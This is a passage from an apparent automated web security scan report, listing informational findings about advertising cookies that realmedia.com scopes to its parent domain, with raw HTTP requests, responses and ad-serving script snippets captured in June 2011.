illuuyr000000134n010m0jllyfqo0000000g4n010wgrlm522h0000000c4n01100xllo31q0000001d4n010obllluutb000000174n010ycqlluvl10000000v4n0117gyllneum0000001e4n01166wlluv7p0000000z4n011015lluutb000000174n010ycmlluv11000000114n010klalluutb000000174n010na6llux090000000p4n010yzblluutb000000174n010spbll9m030000001u4n010dr8lluutb000000174n010ojulluuxo000000154n01101ellrto10000001c4n0114ozllneum0000001e4n0115ztll9l280000001v4n010pdmlluuxo000000154n01101mllrttq0000001b4n0114p7llneum0000001e4n010yyslluuyr000000134n010n9qllxcud0000000i4n010m74lluyhn0000000n4n010m7elluvm30000000t4n01101ulluutb000000174n010lb4llux090000000p4n010zp5llneum0000001e4n010zp7lluuxo000000154n010yy9lluvec0000000x4n010bq5lmivh8000000054n010860lm2xlp0000000f4n010caglluutb000000174n0108d4lm4som0000000e4n0100c6lluutb000000174n0110tyllkjwu0000001i4n010p1blluutb000000174n010lb0lluvec0000000x4n0111z0lluuxo000000154n010njjlluyhn0000000n4n010lazlluuyr000000134n010msvll9m030nqw701u4n0110lxllneum0000001e4n0110telle7v60j51401n4n0112enlluutb000000174n0110rdllikks0esbi01m4n010m3ullv8gv0000000l4n010wbqlluvm30000000t4n010m44lluw660000000r4n0112llllneum0000001e4n010mj8lluv11000000114n0112lmlluutb000000174n0110kylmivh8000000054n010ovullneum0000001e4n010kn9lluv7p0000000z4n0112qnllkonl0000001h4n010bo8lluutb000000174n010mjilluuyr000000134n010dvalluvl10000000v4n010g9zlluw660000000r4n0109splluuxo000000154n01120bllneum0000001e4n0101hvll8nk20opc801z4n0116iell9m030000001u4n010ga6llux090000000p4n0107vglluuyr000000134n010fclllv8gv0000000l4n0118h8lm51zz0000000d4n010ph0lluutb000000174n010e15lluvl10000000v4n010o0ulluv11000000114n01; sglst=2230s9eslluut6000000184n010p0460eef6lmq6u304o7h0014k000p00600armllnepl12s4i01d4j000p00600ey7lmq6u304o7h0014k000p006000ixlljn151b80f01l4n010p0460eefjlmq6u304o7h0034n010p03603dsolmq6u304o7h0034n010p03603bzvllikks1d9gh01m4n010p0460eexulmq6u304o7h0014k000p00600dlell9l281l9zc01t4n010p0460eejelmq6u304o7h0034n010p03603e0vllnepl17gbz01f4n010p03603aojlljn1516jsy01i4j000p006004rylljn1516jsy01i4j000p0060090ill9m031m81601u4n010p0460e9uklljn151b80f01k4n010p03603bvdlljn151b80f01l4n010p0460edz4lmq6u304o7h0034n010p0360356blljn151b80f01j4k000p006001jzll8nk21n6h701z4n010p0460easqllnepl12s4i01d4j000p00600ecwlmq6u304o7h0014k000p0060040ullkg9515qky01g4j000p006003a6lm51zz0qs1a00d4n010p0460dbjflljn1516jsy01i4j000p006005l3lluv0y000000124n010p0460eecklmq6u304o7h0014k000p00600bjhllnepl12s4i01d4j000p0060061jllnepl12s4i01d4j000p00600f7xlmq6u304o7h0014k000p00600cwgllnepl12s4i01d4j000p00600ag2lle7v61hm6301n4n010p0460ebnwlle7v61byyx01k4j000p00600a6slljn151b80f01l4n010p0460eet0lmq6u304o7h0014k000p00600ekglmq6u304o7h0014k000p00600ehallnepl12s4i01d4j000p00600edxlmq6u304o7h0014k000p00600eh8lljn1516jsy01i4j000p00600b3zllnepl12s4i01d4j000p006009q5lljn1516jsy01i4j000p00600ehellnepl12s4i01d4j000p006005nkllnepl17gbz01g4n010p0460ebo0lle7v61byyx01f4j000p006009mkllnepl17gbz01f4n010p03603cwallnepl17gbz01g4n010p0460e3wjllnepl12s4i01d4j000p00600ekzlmq6u304o7h0034n010p03603bo8lle7v61gn6e01n4n010p0460eb3jlmivh80cyk10054n010p04605ehslmq6u304o7h0034n010p03603evalmq6u304o7h0014k000p00600690lle7v61byyx01k4j000p006009c9llnepl12s4i01d4j000p00600719lle7v61byyx01f4j000p00600ebblmq6u304o7h0034n010p03603eyylmq6u304o7h0014k000p00600ef0lmq6u304o7h0014k000p00600es4lmq6u304o7h0034n010p03603eyvlmq6u304o7h0014k000p00600eerlljn1516jsy01i4j000p006009wvlljn151b80f01l4n010p0460eeeplmq6u304o7h0034n010p03603f1wlmq6u304o7h0034n010p03603ebclle7v61byyx01k4j000p00600es0lmq6u304o7h0014k000p006000tille7v61hm6301n4n010p0460e4wcllnepl12s4i01d4j000p0060045mlluuyq000000144n010p0460e5mrlljn1516jsy01i4j000p006005jillnepl17gbz01f4n010p03603e0wlmq6u304o7h0014k000p00600ee8lmq6u304o7h0034n010p03603ez9lmq6u304o7h0014k000p006009gellnepl17gbz01g4n010p0460e; vstcnt=418b010r134me19103210k24ehss103210c24nwh0103210u24n5kn20pm10c203210024fi35103210624eu86218e10p203210s24fw8l103210t24sqj810321002453dh103210324ty31218e10i203210m24u1er218e200202203210324elor218e108203210a24k5jb10pn10c24mwjf103210m24gcxb103210c24rm27218e10820321082496o0218e100203210024f1fr103210c24ep9z118e10q24p056103210024q28r218e108203210g24fn0j103210324b47b103210624uz3i10pm10t24mtp410321002459ao103210324rcz8218e102203210624fu43103210c24wnrf103240220620820924ebm7103210k24fank103210324ffmk103210024vx8f127p10224qqy7127p20020224qfys103210t24tfmw103210024dx7s103210m2450o61032100249ujm103210t2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lluut6160b59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w1on4k0214n020p0560f; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
Set-Cookie: orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
Set-Cookie: rdrlst=4300pi2lluuxo000000164n020klzlluuxo000000164n020x1blluutb000000184n021918lmuv1k000000034n020e0dlluuxo000000164n020e0klluyhn0000000o4n020d6hll8nk2000000204n020mollluvl10000000w4n020e0rlluv11000000124n02007jlluutb02i2z0184n020w9wlluutb000000184n021196llkg950000001k4n021195llnepl09y6p01h4n020bnelm6ifs0000000a4n021194lljpq30ogm301l4n020bnhlm52500000000b4n0205grlmdlbx000000074n0201g3ll8nk20opc80204n020j4wllv8nq0000000k4n021908lmvu19000000024n021193llnesr0000001g4n021192lljn150dpv501m4n020moxlluvec0000000y4n020dt1lluvec0000000y4n0217xdlluutb000000184n02114qlluutb000000184n020e6mll9m030000001v4n020e6llluv7p000000104n020kmmlluw660000000s4n020kk3lluvm30000000u4n02159jlm523d0000000c4n020e5ylluvm30000000u4n020wgclluutb000000184n0212anlluuxo000000164n020wgmllxcud0000000j4n020gjzlluv7p000000104n020df3lluv11000000124n020m0tllv8gv0000000m4n020yc9lluv7p000000104n020wghllv8nq0000000k4n020yzxlluv11000000124n020gjqllv8nq0000000k4n02167alluuyr000000144n020m9illuuyr000000144n020wgrlm522h0000000d4n020m0jllyfqo0000000h4n02100xllo31q0000001e4n020obllluutb000000184n020ycqlluvl10000000w4n02166wlluv7p000000104n021015lluutb000000184n020ycmlluv11000000124n020klalluutb000000184n020na6llux090000000q4n020yzblluutb000000184n020spbll9m030000001v4n020dr8lluutb000000184n020ojulluuxo000000164n02101ellrto10000001d4n0214ozllneum0000001f4n0215ztll9l280000001w4n020pdmlluuxo000000164n02101mllrttq0000001c4n020yyslluuyr000000144n020n9qllxcud0000000j4n020m74lluyhn0000000o4n020m7elluvm30000000u4n02101ulluutb000000184n020lb4llux090000000q4n020zp7lluuxo000000164n020yy9lluvec0000000y4n020bq5lmivh8000000064n020860lm2xlp0000000g4n020caglluutb000000184n0208d4lm4som0000000f4n0200c6lluutb000000184n0210tyllkjwu0000001j4n020lb0lluvec0000000y4n0211z0lluuxo000000164n020njjlluyhn0000000o4n020lazlluuyr000000144n020msvll9m030nqw701v4n0210telle7v60j51401o4n0212enlluutb000000184n0210rdllikks0esbi01n4n020m3ullv8gv0000000m4n020wbqlluvm30000000u4n020m44lluw660000000s4n0212llllneum0000001f4n0212lmlluutb000000184n020mj8lluv11000000124n0210kylmivh8000000064n020ovullneum0000001f4n0212qnllkonl0000001i4n020kn9lluv7p000000104n020mjilluuyr000000144n020dvalluvl10000000w4n020g9zlluw660000000s4n02120bllneum0000001f4n0201hvll8nk20opc80204n0216iell9m030000001v4n020ga6llux090000000q4n0207vglluuyr000000144n020fclllv8gv0000000m4n020ph0lluutb000000184n0218h8lm51zz0000000e4n020o0ulluv11000000124n020e15lluvl10000000w4n02; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
Set-Cookie: sglst=2230s9eslluut6000000194n020p0560fef6lmq6u304o7h0014k000p00600armllnepl12s4i01d4j000p00600ey7lmq6u304o7h0014k000p006000ixlljn151b80f01m4n020p0560fefjlmq6u304o7h0044n020p04604dsolmq6u304o7h0044n020p04604bzvllikks1da6e01n4n020p0560fexulmq6u304o7h0014k000p00600dlell9l281l9zc01u4n020p0560fejelmq6u304o7h0044n020p04604e0vllnepl17gbz01g4n020p046044rylljn1516jsy01i4j000p00600aojlljn1516jsy01i4j000p006009uklljn151b80f01l4n020p0460490ill9m031m8r301v4n020p0560fbvdlljn151b80f01m4n020p0560f56blljn151b80f01j4k000p00600dz4lmq6u304o7h0044n020p046041jzll8nk21n7740204n020p0560fecwlmq6u304o7h0014k000p00600asqllnepl12s4i01d4j000p0060040ullkg9515qky01g4j000p006003a6lm51zz0qsr700e4n020p0560ebjflljn1516jsy01i4j000p006005l3lluv0y000000134n020p0560fecklmq6u304o7h0014k000p00600bjhllnepl12s4i01d4j000p0060061jllnepl12s4i01d4j000p00600f7xlmq6u304o7h0014k000p00600cwgllnepl12s4i01d4j000p00600ag2lle7v61hmw001o4n020p0560fbnwlle7v61byyx01k4j000p00600a6slljn151b80f01m4n020p0560fet0lmq6u304o7h0014k000p00600ekglmq6u304o7h0014k000p00600ehallnepl12s4i01d4j000p00600edxlmq6u304o7h0014k000p00600eh8lljn1516jsy01i4j000p00600b3zllnepl12s4i01d4j000p006009q5lljn1516jsy01i4j000p00600ehellnepl12s4i01d4j000p006005nkllnepl17gbz01h4n020p0560fbo0lle7v61byyx01f4j000p006009mkllnepl17gbz01g4n020p04604cwallnepl17gbz01h4n020p0560f3wjllnepl12s4i01d4j000p00600ekzlmq6u304o7h0044n020p04604bo8lle7v61gn6e01o4n020p0560fb3jlmivh80cz9y0064n020p05606690lle7v61byyx01k4j000p00600evalmq6u304o7h0014k000p00600ehslmq6u304o7h0044n020p04604719lle7v61byyx01f4j000p006009c9llnepl12s4i01d4j000p00600ebblmq6u304o7h0044n020p04604eyylmq6u304o7h0014k000p00600ef0lmq6u304o7h0014k000p00600eyvlmq6u304o7h0014k000p00600es4lmq6u304o7h0044n020p04604eerlljn1516jsy01i4j000p006009wvlljn151b80f01m4n020p0560febclle7v61byyx01k4j000p00600f1wlmq6u304o7h0044n020p04604eeplmq6u304o7h0044n020p046040tille7v61hmw001o4n020p0560fes0lmq6u304o7h0014k000p006004wcllnepl12s4i01d4j000p0060045mlluuyq000000154n020p0560f5mrlljn1516jsy01i4j000p006005jillnepl17gbz01g4n020p04604e0wlmq6u304o7h0014k000p00600ez9lmq6u304o7h0014k000p00600ee8lmq6u304o7h0044n020p046049gellnepl17gbz01h4n020p0560f; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
Set-Cookie: vstcnt=418b010r134me19103210k24ehss103210c24nwh0103210u24n5kn20pm10c203210024fw8l103210t24eu86218e10p203210s24fi35103210624sqj810321002453dh103210324ty31218e10i203210m24u1er218e200202203210324elor218e108203210a24k5jb10pn10c24mwjf103210m24gcxb103210c24rm27218e10820321082496o0218e100203210024f1fr103210c24ep9z118e10q24p056103210024q28r218e108203210g24fn0j103210324b47b103210624uz3i10pm10t24mtp410321002459ao103210324rcz8218e102203210624fu43103210c24wnrf103240220620820924ebm7103210k24qfys103210t24qqy7127p20020224vx8f127p10224ffmk103210024fank103210324dx7s103210m24tfmw1032100249ujm103210t2450o610321002; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
Location: http://ad.yieldmanager.com/unpixel?t=2&id=742004&id=710923&id=1258223&id=1056859&id=1124603&id=1299222&id=851732&id=1152937&id=919037
Content-Length: 0
Date: Thu, 16 Jun 2011 12:30:42 GMT
Connection: close

10.69. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P2018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308242941786&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P1018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:49:01 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P2018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 432
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 08:37:49 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/493145266/x15/USNetwork/BCN2011020713_001_AllMenus/ROCL_RETARGETING_300x250.jpg/72
...[SNIP]...

10.70. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|Q1018UW|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308246975085&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:56:14 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|Q1018UW|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 887
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 09:45:03 GMT;path=/;httponly

document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2617542&PluID=0&e=0&w=300&h=250&ord=2108699877&ncu=$$http://network.realmedia.com/RealMedia/ads/click_l
...[SNIP]...

10.71. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018HS|O2018RL|O2018UF|O1018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:07:41 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1331
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:08:41 GMT;path=/;httponly

document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2789858&PluID=0&w=300&h=250&ord=1946055127&ncu=$$http://network.realmedia.com/RealMedia/ads/click_lx.ad
...[SNIP]...

10.72. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO6018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241700922&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO5018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:28:20 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO6018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3110
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 08:17:08 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.73. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308242321652&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO7018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:38:40 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3128
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:39:40 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.74. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO3018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO2018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:18:08 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO3018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3130
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:19:08 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.75. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO7018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308242011123&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO6018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:33:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO7018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3108
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 08:22:19 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

